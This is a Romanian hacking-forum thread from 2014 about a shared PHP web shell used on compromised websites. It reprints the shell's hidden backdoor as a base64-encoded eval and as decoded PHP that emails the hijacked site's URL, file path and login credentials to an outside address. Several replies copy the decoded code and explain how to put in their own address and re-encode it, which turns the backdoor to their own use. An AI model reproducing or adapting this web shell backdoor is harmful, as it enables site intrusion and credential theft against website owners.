MadAgent Posted August 19, 2014 Report Posted August 19, 2014 Login bypass Exploit -> poti executa comenzi trimitand parametrii prin post sau GETExamplu:SyRiAn Electronic Army Shell :: SEA ShellBypass:SyRiAn Electronic Army Shell :: SEA ShellMai vezi si panoul de comanda, deci nu te mai complici sa dai ca Dorel prin GET si POST... Quote
Nytro Posted August 19, 2014 Report Posted August 19, 2014 Backdoor: <?php eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsNCmlmKCFlcmVnKCRzaXRlLCAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpDQp7DQokdG8gPSAic2F0dGlhMzRAZ21haWwuY29tIjsNCiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7DQokaGVhZGVyID0gImZyb206IE5ldyBTaGVsbCA8c2FoYTIxQGRldi1wdHMuY29tPiI7DQokbWVzc2FnZSA9ICJMaW5rIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187DQokbWVzc2FnZSAuPSAiIFVzZXIgOiAiIC4gJHVzZXI7DQokbWVzc2FnZSAuPSAiIFBhc3MgOiAiIC4gJHBhc3M7DQokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQplY2hvICIiOw0KZXhpdDsNCn0=')); ?>Adica:$site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])){$to = "sattia34@gmail.com";$subject = "New Shell Uploaded";$header = "from: New Shell <saha21@dev-pts.com>";$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$message .= "Path : " . __file__;$message .= " User : " . $user;$message .= " Pass : " . $pass;$sentmail = mail($to, $subject, $message, $header);echo "";exit;} Quote
CocolinoRST Posted August 19, 2014 Report Posted August 19, 2014 (edited) L-am gasit pe net nu aveam habar ca are Backdoor nici nu prea am fost curios sa il inspectez.. Edited September 24, 2014 by CocolinoRST Quote
Active Members dancezar Posted August 19, 2014 Active Members Report Posted August 19, 2014 Pai l-am gasit pe net si am zis sa il impartasesc cu useri RST, chiar nu am vazut ca e backdoor sau ceva.. Ce este un backdoor imi poate explica si mie cineva? Poate fi vreun virus, adica eu am luat acel virus? Sau un backdoor este un virus cu care afli datele de pe un site anume?Daca tu bagi un shell intr-un site , dezvoltaturul shellului sau vreun gigel , are si el acces la acel shell Quote
CocolinoRST Posted August 19, 2014 Report Posted August 19, 2014 (edited) Multumesc pentru raspuns. Edited September 24, 2014 by CocolinoRST Quote
nonimporta Posted August 19, 2014 Report Posted August 19, 2014 Tu nu ai fost infectat cu nimic dar siteul pe care ai urcat shelul este compromis de doua ori,odata de tine si inca o data de cel care a pus acel backdoor.Este o practica des intalnita la diverse programe de hacking /scanere etc ca cel care le face sa se asigure ca profita la maxim de pe urma lor. Quote
Scorpionadi Posted August 21, 2014 Report Posted August 21, 2014 Din curiozitate, nu se poate modifica acest shell pentru a nu mai fi backdoor?din cate am inteles este un shell destul de bun si cred ca cei care se pricep la php pot face unele modificari Quote
quadxenon Posted August 21, 2014 Report Posted August 21, 2014 Nu o fi de ajuns sa stergi partea de cod ce a aratat-o Nytro ? Quote
dr.d3v1l Posted August 22, 2014 Report Posted August 22, 2014 iei codul dai un decode base 64 $site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])){$to = "masteritaliano@outlook.it";$subject = "New Shell Uploaded";$header = "from: New Shell <saha21@dev-pts.com>";$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$message .= "Path : " . __file__;$message .= " User : " . $user;$message .= " Pass : " . $pass;$sentmail = @mail($to, $subject, $message, $header);echo "";exit;}dupa faci encode base 64 si in bagi acolo Quote
quadxenon Posted August 22, 2014 Report Posted August 22, 2014 iei codul dai un decode base 64 $site = "www.dev-pts.com/vb";if(!ereg($site, $_SERVER['SERVER_NAME'])){$to = "masteritaliano@outlook.it";$subject = "New Shell Uploaded";$header = "from: New Shell <saha21@dev-pts.com>";$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";$message .= "Path : " . __file__;$message .= " User : " . $user;$message .= " Pass : " . $pass;$sentmail = @mail($to, $subject, $message, $header);echo "";exit;}dupa faci encode base 64 si in bagi acolo Sa nu uiti intai in loc de masteritaliano@outlook.it sa pui sugi.pula@lammere.com si apoi sa faci encode in base64. Quote
CocolinoRST Posted August 22, 2014 Report Posted August 22, 2014 Stergi frumusel partea de cod care a zis Nytro ca este backdoor.Ce poate fi mai simplu de atat? Quote
Sphere Posted August 25, 2014 Report Posted August 25, 2014 Acum doua zile nu stiai ce e un backdoor si intrebai daca te-a virusat shell-ul php iar acum stii si cum se scoate. Nu-i asa ca esti dubios ?P.S. DUBIÓS adj. 1. v. nesigur. 2. v. suspect. 3. echivoc, îndoielnic, necurat, suspect Quote
CocolinoRST Posted September 24, 2014 Report Posted September 24, 2014 Cum spui tu, poate eu m-am documentan pe parcurs.. Dar cum spui tu sunt atat de Dubios, daca dai un search pe google ai sa vezi ca sunt si cautat de N.A.S.A.. Frate glumele proaste gen astea facute de tine nu isi au rostul intelegi? Nu mai are voie omul sa intrebe ca sare un baiat cu gura, si stai calm ca eu i-am zis ce a zis Nytro deci ce era asa greu sa citesc ce a zis Nytro si sa spun aici? Quote
